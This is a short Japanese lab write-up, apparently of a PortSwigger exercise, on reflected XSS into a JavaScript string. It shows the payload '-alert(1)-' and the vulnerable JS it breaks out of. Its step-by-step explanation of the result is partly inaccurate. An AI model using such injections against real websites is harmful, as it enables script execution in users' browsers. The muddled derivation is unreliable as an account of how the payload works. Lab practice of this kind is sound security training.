Reflected XSS into a JavaScript string with angle brackets HTML encoded
検索欄に適当な文字を入れ、リクエストを確認
入れた文字がレスポンスのJSに反映されてます
検索欄に
'-alert(1)-'
をいれます。クリア!
JSソースを追ってみます。
var searchTerms = 'abc';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
abcの位置に、
'-alert(1)-'
が入って、
var searchTerms = ''-alert(1)-'';
↓
var searchTerms = alert(1);
↓
document.write('<img src="/resources/images/tracker.gif?searchTerms='alert(1);'">');
*alert(1);部分は、URLエンコードされてますが。
結果、searchTermsで受け取って、そのまま表示しているので、
alert(1); が実行されてしまいます。
–)v
コメント